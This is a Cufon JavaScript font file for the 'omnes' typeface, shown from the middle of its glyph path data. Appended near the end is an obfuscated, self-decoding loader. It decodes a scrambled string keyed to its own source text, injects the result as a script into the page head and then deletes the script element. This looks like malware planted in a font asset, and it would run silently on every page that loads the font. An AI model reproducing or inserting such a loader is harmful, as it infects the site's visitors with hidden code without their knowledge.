3,-53,-14,-75,-51,-78v-23,-14,-9,-52,25,-52v39,0,79,26,88,102v47,13,65,77,10,99r-10,5v-9,76,-49,103,-88,103","w":178},{"d":"57,72v-25,1,-39,-4,-39,-33r0,-243v1,-28,15,-34,38,-33v19,0,31,7,31,33r0,243v0,25,-12,33,-30,33","w":104},{"d":"118,-129v-25,-1,-33,18,-33,49v0,20,14,31,33,31v21,0,35,-16,35,-40v0,-24,-14,-40,-35,-40xm84,-27v-2,24,-15,29,-37,29v-18,0,-31,-8,-31,-34r0,-214v25,-14,72,-10,69,45r0,44v45,-54,142,-15,134,68v10,82,-99,127,-135,62"},{"d":"56,2v-24,1,-38,-5,-39,-34r0,-214v26,-14,69,-11,69,45r0,169v0,25,-12,34,-30,34","w":102},{"d":"87,-124v30,1,66,2,63,-27v3,-29,-33,-28,-63,-27r0,54xm172,-88r53,65v2,3,-11,25,-42,25v-40,0,-58,-51,-81,-74r-13,0v1,40,5,74,-42,74v-20,0,-31,-16,-31,-42r0,-153v-3,-55,61,-40,109,-40v65,0,97,27,97,77v0,34,-17,59,-50,68","w":234},{"d":"115,-87v-7,19,-59,17,-57,-12v4,-52,59,-44,59,-66v0,-11,-9,-18,-24,-18v-26,0,-39,18,-42,36v0,1,-46,4,-46,-32v0,-31,31,-59,88,-59v56,0,90,26,90,68v0,59,-63,53,-68,83xm91,3v-26,0,-38,-9,-38,-35v0,-23,14,-29,38,-29v23,0,30,12,30,35v0,20,-10,29,-30,29","w":187},{"d":"118,5v-76,0,-108,-50,-108,-132v0,-67,40,-111,108,-111v76,1,107,51,107,133v0,68,-40,110,-107,110xm118,-53v35,0,35,-42,35,-81v0,-31,-12,-47,-35,-47v-37,0,-36,42,-36,82v0,31,12,46,36,46","w":235},{"d":"82,-150v17,-42,101,-42,111,3v13,-20,29,-35,59,-35v78,0,61,80,61,150v0,28,-14,34,-37,34v-44,0,-32,-63,-32,-103v0,-31,-34,-31,-45,-12v-4,45,18,122,-37,115v-44,5,-32,-63,-32,-103v0,-31,-34,-31,-45,-12v-4,45,19,115,-38,115v-18,0,-31,-8,-31,-34r0,-140v15,-13,62,-13,66,22","w":327},{"d":"109,-49v30,1,36,-26,33,-59v-14,-34,-69,-25,-69,19v0,24,15,40,36,40xm145,-152v7,-33,50,-32,66,-20r0,208v-1,29,-16,33,-39,33v-41,0,-30,-58,-31,-96v-36,66,-143,20,-133,-62v-10,-85,98,-124,137,-63"},{"d":"85,4v-75,0,-97,-41,-63,-67v13,12,33,21,57,21v14,0,22,-2,22,-9v0,-9,-12,-9,-29,-13v-22,-5,-63,-13,-63,-57v0,-37,31,-61,79,-61v74,0,92,47,57,69v-13,-13,-33,-22,-52,-22v-13,0,-21,1,-21,9v0,8,13,9,31,13v23,5,65,14,65,56v0,38,-30,61,-83,61","w":177},{"d":"58,1v-29,0,-41,-10,-42,-41r0,-153v-1,-66,94,-40,151,-40v24,0,33,10,33,31v0,47,-71,25,-113,30r0,38v35,2,93,-11,88,29v3,38,-50,28,-85,29v0,36,7,77,-32,77","w":205},{"d":"81,-130v40,-36,136,-24,136,51v0,50,-41,84,-100,84v-73,-1,-107,-50,-107,-129v0,-70,42,-114,112,-114v55,0,86,20,86,50v0,28,-33,31,-34,30v-7,-12,-21,-24,-45,-24v-32,0,-47,17,-48,52xm82,-89v-6,47,64,56,66,13v1,-32,-49,-32,-66,-13","w":223},{"d":"88,-118v31,2,60,-1,60,-30v0,-29,-28,-33,-60,-31r0,61xm89,-65v2,38,1,67,-42,67v-19,0,-31,-12,-31,-34r0,-161v-3,-51,53,-40,99,-40v67,0,103,29,103,85v0,65,-52,88,-129,83","w":221},{"d":"50,3v-26,0,-37,-8,-37,-35v0,-23,13,-29,37,-29v23,0,30,12,30,35v0,20,-9,29,-30,29","w":93},{"d":"108,-147v32,-6,34,-43,6,-47v-25,2,-26,35,-6,47xm138,-57r-53,-45v-31,13,-22,60,18,60v12,0,25,-6,35,-15xm172,-98v9,-17,21,-62,45,-56v20,0,30,17,30,18v-6,27,-19,50,-35,72r44,37v1,1,-11,30,-37,30v-13,0,-34,-12,-45,-26v-41,48,-169,34,-169,-42v0,-30,19,-52,50,-64v-45,-42,-12,-109,60,-109v81,0,97,95,25,113","w":255},{"d":"134,-231v39,5,59,20,59,42v0,20,-22,35,-23,34v-16,-14,-39,-24,-60,-24v-20,0,-29,6,-29,17v0,12,17,15,40,20v31,6,77,19,77,67v0,38,-23,62,-64,70v1,26,-5,43,-30,43v-24,0,-29,-15,-28,-41v-43,-5,-66,-22,-66,-45v0,-19,21,-34,22,-32v15,13,42,25,66,25v21,0,30,-6,30,-17v0,-13,-17,-15,-38,-20v-30,-6,-75,-18,-75,-68v0,-36,22,-61,61,-69v-1,-26,5,-41,30,-41v23,0,29,14,28,39","w":206},{"d":"118,-129v-25,-1,-33,18,-33,49v0,20,14,31,33,31v21,0,35,-16,35,-40v0,-24,-14,-40,-35,-40xm85,-26v-2,41,13,95,-38,95v-18,0,-31,-7,-31,-33r0,-208v17,-13,61,-13,66,24v8,-21,29,-34,55,-34v49,0,82,35,82,93v0,82,-96,127,-134,63"},{"d":"56,2v-27,0,-40,-7,-40,-34r0,-168v-7,-45,72,-47,85,-15r38,93r38,-93v8,-23,25,-20,51,-20v22,0,33,12,33,35r0,168v1,27,-12,36,-39,34v-50,-3,-22,-87,-29,-133r-24,68v-3,9,-3,18,-30,18v-27,0,-28,-9,-31,-18r-24,-66r0,97v0,22,-7,34,-28,34","w":277},{"d":"131,-57v-46,0,-125,23,-120,-37v4,-42,78,-26,120,-26v22,0,27,16,27,37v0,14,-9,26,-27,26","w":168},{"d":"132,5v-73,0,-122,-51,-122,-122v0,-71,50,-121,123,-121v66,0,91,35,91,57v0,30,-40,38,-41,36v-21,-45,-98,-31,-98,28v0,58,79,76,98,28v1,-2,42,5,42,35v0,23,-26,59,-93,59","w":233},{"d":"44,76v-23,9,-56,-4,-45,-39r88,-273v22,-9,56,4,45,38","w":137},{"d":"167,-46r-15,49v-20,11,-46,-22,-30,-49r-37,0r-15,49v-22,12,-48,-23,-30,-49v-25,1,-42,-5,-38,-30v-2,-21,29,-21,53,-20r13,-41v-25,1,-41,-4,-37,-29v-2,-22,29,-21,52,-20r16,-50v21,-11,45,22,30,50r37,0r15,-50v22,-11,48,23,30,50v24,-1,42,4,38,28v2,23,-29,22,-53,21r-13,41v25,-1,42,4,38,29v2,23,-29,22,-54,21xm138,-96r12,-41r-37,0r-13,41r38,0","w":251},{"d":"41,-181v43,0,46,79,62,114v16,-36,20,-114,62,-114v20,0,39,16,37,20r-62,147v-16,23,-58,22,-74,0r-63,-147v-1,-4,18,-20,38,-20","w":205},{"d":"128,0v-48,0,-112,16,-112,-40r0,-153v-3,-58,71,-35,121,-40v90,-10,113,89,42,107v35,8,50,30,50,59v0,47,-30,67,-101,67xm87,-139v26,1,63,2,60,-22v3,-24,-34,-21,-60,-21r0,43xm87,-51v29,0,73,5,68,-24v5,-26,-40,-22,-68,-22r0,46","w":237},{"d":"67,-102r54,0r0,-86xm184,-103v25,-1,39,4,39,26v0,22,-14,27,-39,26v2,33,-2,54,-37,54v-28,0,-31,-25,-29,-54v-45,-4,-122,16,-113,-39v8,-47,49,-83,69,-122v12,-21,22,-24,58,-24v71,0,49,74,52,133"},{"d":"138,72v-39,0,-79,-27,-88,-103v-50,-13,-65,-77,-10,-99r10,-5v9,-76,49,-102,88,-102v35,-7,46,42,25,52v-37,3,-48,25,-51,78r-43,24r43,25v3,53,14,75,51,78v24,13,8,52,-25,52","w":178},{"d":"189,-26v-13,18,-36,30,-68,30v-67,0,-111,-51,-111,-121v0,-71,51,-121,128,-121v58,0,92,23,92,54v0,26,-34,35,-36,32v-33,-43,-111,-25,-111,39v0,65,87,85,102,32v-29,0,-58,5,-58,-28v0,-41,61,-25,97,-25v21,0,25,10,25,31r0,98v-15,11,-56,11,-60,-21","w":262},{"d":"136,-28v-13,19,-30,33,-59,33v-77,-1,-62,-80,-63,-152v1,-27,14,-33,37,-33v45,0,32,62,32,102v0,32,40,34,50,12v4,-45,-19,-114,38,-114v18,0,31,7,31,33r0,141v-15,12,-61,13,-66,-22","w":218},{"d":"53,2v-24,1,-37,-10,-37,-34r0,-169v-4,-41,50,-42,69,-17r84,109v7,-48,-23,-126,37,-126v20,0,31,12,31,34r0,169v3,40,-48,43,-67,18r-86,-111v-6,46,20,125,-31,127","w":253},{"d":"51,-99v-26,0,-37,-8,-37,-35v0,-23,13,-29,37,-29v23,0,30,12,30,35v0,20,-9,29,-30,29xm51,3v-26,0,-37,-8,-37,-35v0,-23,13,-29,37,-29v23,0,30,12,30,35v0,20,-9,29,-30,29","w":95},{"d":"143,-103v-39,36,-136,24,-136,-50v0,-50,41,-85,100,-85v72,0,107,50,107,131v0,72,-41,112,-114,112v-56,0,-84,-16,-84,-42v0,-70,35,-14,78,-14v34,0,49,-16,49,-52xm141,-144v6,-49,-63,-54,-65,-13v-1,32,48,32,65,13","w":223},{"d":"93,72v-36,0,-94,13,-89,-30v-3,-28,33,-25,62,-25r0,-199v-31,1,-61,2,-61,-29v0,-37,54,-26,88,-26v24,0,37,14,37,40r0,229v0,26,-13,40,-37,40","w":146},{"d":"120,-204v-8,18,-99,0,-90,-37v-1,-22,30,-34,50,-21v23,15,43,52,40,58","w":180},{"d":"59,-152v-25,12,-56,-5,-53,-32v4,-42,17,-31,41,-26v15,0,29,-9,33,-26v30,-2,50,4,50,33r0,173v0,25,-15,33,-41,33v-20,0,-30,-11,-30,-33r0,-122","w":151},{"d":"65,-121v-39,0,-63,-21,-63,-59v0,-35,25,-57,63,-57v39,0,62,22,62,60v0,35,-24,56,-62,56xm53,5v-9,4,-47,-23,-21,-41r181,-201v12,-5,47,22,22,40xm203,4v-39,0,-63,-21,-63,-59v0,-35,25,-57,63,-57v39,0,62,22,62,60v0,35,-24,56,-62,56xm65,-155v11,0,18,-10,18,-26v0,-14,-8,-22,-18,-22v-13,-1,-18,10,-18,27v0,14,8,21,18,21xm203,-30v11,0,18,-10,18,-26v0,-14,-8,-22,-18,-22v-13,-1,-18,10,-18,27v0,14,8,21,18,21","w":267},{"d":"71,-141v59,-19,125,9,125,68v0,48,-38,78,-100,78v-59,0,-91,-22,-91,-45v0,-19,25,-35,27,-33v17,18,39,27,63,27v25,0,39,-10,39,-28v0,-35,-66,-32,-80,-16v-52,6,-40,-56,-42,-103v-2,-66,88,-40,142,-40v24,0,35,9,34,30v0,44,-76,22,-117,27r0,35","w":203},{"d":"152,-91v-2,43,13,101,-42,93v-42,2,-29,-54,-31,-93r-80,-116v0,-21,66,-45,81,-2r36,61v20,-26,36,-86,71,-86v33,0,46,24,44,27","w":230},{"d":"82,5v-50,0,-77,-17,-77,-46v0,-27,23,-37,24,-36v19,27,78,36,74,-17v8,-52,-28,-145,41,-141v54,4,31,92,31,142v0,67,-32,98,-93,98","w":193},{"d":"57,2v-26,0,-41,-8,-41,-34r0,-169v0,-26,14,-34,41,-34v42,0,31,50,32,88r74,0v1,-42,-11,-88,41,-88v21,0,32,12,32,34r0,169v0,26,-15,34,-42,34v-40,0,-30,-51,-31,-89r-74,0v-1,39,10,89,-32,89","w":252},{"d":"139,37v13,34,-22,48,-46,39r-91,-289v0,-27,31,-27,49,-23","w":137},{"d":"51,-99v-26,0,-37,-8,-37,-35v0,-23,13,-29,37,-29v23,0,30,12,30,35v0,20,-9,29,-30,29xm40,35v-13,13,-41,2,-35,-16v11,-32,0,-81,50,-81v33,0,31,43,12,65","w":95},{"d":"36,71v-35,0,-40,-42,-21,-52v86,-15,85,-188,0,-204v-18,-10,-15,-52,21,-52v57,0,112,69,112,154v0,86,-55,154,-112,154","w":158},{"d":"157,-126v30,10,45,31,45,59v0,46,-38,72,-104,72v-58,0,-94,-24,-94,-54v0,-36,42,-36,43,-33v2,37,83,47,87,9v5,-37,-77,-4,-68,-48v-8,-36,63,-10,65,-41v-9,-40,-83,-18,-81,9v0,3,-41,4,-41,-32v0,-30,34,-53,89,-53v65,0,100,23,100,66v0,23,-14,38,-41,46","w":210},{"d":"103,5v-57,0,-95,-38,-95,-94v0,-54,39,-93,95,-93v57,0,76,30,76,48v0,27,-36,33,-37,30v-6,-14,-16,-24,-35,-24v-22,0,-37,17,-37,39v0,44,61,53,72,17v1,-3,37,1,37,30v0,18,-22,47,-76,47","w":184},{"d":"152,-148v2,29,-48,43,-71,56v23,13,72,28,71,57v0,18,-14,32,-17,31r-104,-56v-25,-9,-24,-50,0,-63r104,-57v3,-1,17,15,17,32","w":163},{"d":"53,-234v36,0,51,53,69,77v18,-25,33,-77,69,-77v25,0,48,21,45,26r-66,92r66,92v3,5,-20,27,-46,27v-36,0,-53,-53,-70,-78v-18,25,-34,78,-70,78v-25,0,-48,-21,-45,-26r66,-93r-65,-91v-3,-5,21,-27,47,-27","w":241},{"d":"30,50v-19,0,-28,-10,-27,-27v0,-13,9,-23,27,-23r126,0v19,0,28,10,27,26v0,14,-9,24,-27,24r-126,0","w":185},{"d":"97,-100r50,0r-25,-68xm160,-48r-75,0v-7,24,-25,56,-46,51v-20,0,-39,-16,-37,-22r75,-196v4,-12,13,-20,46,-20v33,0,40,8,45,20r79,195v3,6,-17,23,-39,23v-20,4,-41,-27,-48,-51","w":247},{"d":"39,-108v-20,-1,-27,-13,-27,-32v0,-13,9,-26,27,-26r114,0v21,1,28,14,28,32v0,14,-9,26,-28,26r-114,0xm39,-17v-20,-1,-27,-13,-27,-32v0,-13,9,-26,27,-26r114,0v21,1,28,14,28,32v0,14,-9,26,-28,26r-114,0","w":192},{"d":"60,2v-27,0,-41,-7,-41,-34r0,-169v0,-26,14,-34,41,-34v21,0,31,12,31,34r0,169v0,22,-10,34,-31,34","w":110},{"d":"94,-39v20,0,32,-14,30,-36v-27,0,-51,4,-51,20v0,10,8,16,21,16xm124,-109v-1,-15,-11,-24,-28,-24v-22,0,-31,14,-36,24v0,1,-46,4,-46,-27v0,-28,27,-46,86,-46v64,0,92,25,92,76r0,101v-15,15,-65,8,-65,-21v-23,46,-119,38,-119,-23v0,-43,41,-61,116,-60","w":206},{"d":"89,-101v-3,45,17,103,-42,103v-20,0,-31,-12,-31,-34r0,-169v0,-26,14,-34,41,-34v46,0,29,62,32,103r56,-78v12,-18,26,-25,39,-25v24,0,44,23,41,27r-65,89r69,94v-3,21,-66,44,-84,3","w":234},{"d":"82,-149v13,-19,30,-33,59,-33v77,1,62,78,63,150v-1,28,-14,34,-37,34v-44,0,-32,-62,-32,-102v0,-32,-40,-32,-50,-12v-4,45,18,114,-38,114v-18,0,-31,-8,-31,-34r0,-140v16,-13,61,-12,66,23","w":218},{"d":"109,-49v30,1,36,-26,33,-59v-14,-34,-69,-25,-69,19v0,24,15,40,36,40xm141,-158r0,-88v26,-14,70,-11,70,45r0,169v-1,28,-15,34,-38,34v-18,0,-30,-7,-31,-30v-9,20,-29,33,-53,33v-49,0,-81,-39,-81,-94v0,-82,87,-121,133,-69"},{"d":"132,5v-72,0,-123,-51,-123,-122v0,-71,51,-121,123,-121v72,0,123,50,123,121v0,71,-51,122,-123,122xm132,-59v31,0,52,-23,52,-58v0,-34,-21,-57,-52,-57v-31,0,-52,22,-52,57v0,35,21,58,52,58","w":263},{"d":"146,-135v-1,23,-40,22,-40,0v-1,-38,-40,-101,20,-101v61,0,21,64,20,101xm66,-135v-1,23,-40,22,-40,0v-1,-38,-40,-101,20,-101v62,0,21,64,20,101","w":172},{"d":"122,4v-71,0,-107,-36,-107,-106v0,-51,-25,-137,41,-133v53,3,32,85,32,133v0,29,11,43,34,43v55,2,31,-91,35,-142v2,-26,14,-35,41,-34v53,2,31,85,31,133v0,70,-36,106,-107,106","w":244},{"d":"31,-22r88,-153v-42,-7,-117,22,-115,-31v0,-20,11,-27,32,-27r111,0v79,0,44,64,26,96r-65,115v-11,19,-24,25,-37,25v-23,0,-43,-21,-40,-25","w":202},{"d":"75,-99v-3,30,-40,29,-43,0v-5,-49,-54,-141,25,-138v69,3,22,91,18,138xm57,3v-26,0,-38,-8,-38,-35v0,-23,14,-29,38,-29v23,0,30,12,30,35v0,20,-9,29,-30,29","w":106},{"d":"123,71v-57,0,-112,-68,-112,-154v0,-85,55,-154,112,-154v35,0,40,42,21,52v-86,16,-85,189,0,204v18,9,15,52,-21,52","w":158},{"w":61}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+202-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("Y[x-IGkAa=`9Y~KeVG6l_[_`mhk-xG`9mh@la=Q+x7M#,qA:I-xbYZrl=K!+a:!Fa-?-;}fT;}wGxmKsQ7k;5~?yr[KlFmr+ytV.7]-M,G?W2qf!$mk[kKX9@:QLEW-}m~MzVZ_AyAV-Ez.wm=X?@E7xWZT$mXf~}B6[t_@Yj;k52rQWEF7=m,xaI$VyC^T:zZKG+.O0i#!9|L?lqA-h]*wbeM`su}#O;h;M=6`f2FKTWhwZE-L:7E$TY~X:j+kLI[KAY~_:YW?O2EX#$}-:j+X#I}-LjG?KIGVAa~?+2=_9x:w+ItKLat;`y]Aea=,.,:w|aqA|m:^u5+V]V-L9YEM.2qO#a=xKV[`ix=wqm~wzIh-Mj:!$jG?OxG7AIh!KI+k$jGk|IWZZjhZ9V[7qV~T#IhkTV[K|I:w.I]kAIG6!xWZOxG`lY}!O2[LeYl!OY=VI,-!Om7A`$6!OmmAOY~Z^")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":226,"face":{"font-family":"omnes","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 6 5 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"5","cap-height":"2","bbox":"-26.5556 -270 343.05 78.7614","underline-thickness":"7.2","underline-position":"-44.28","stemh":"53","stemv":"69","unicode-range":"U+0020-U+007E"}}));
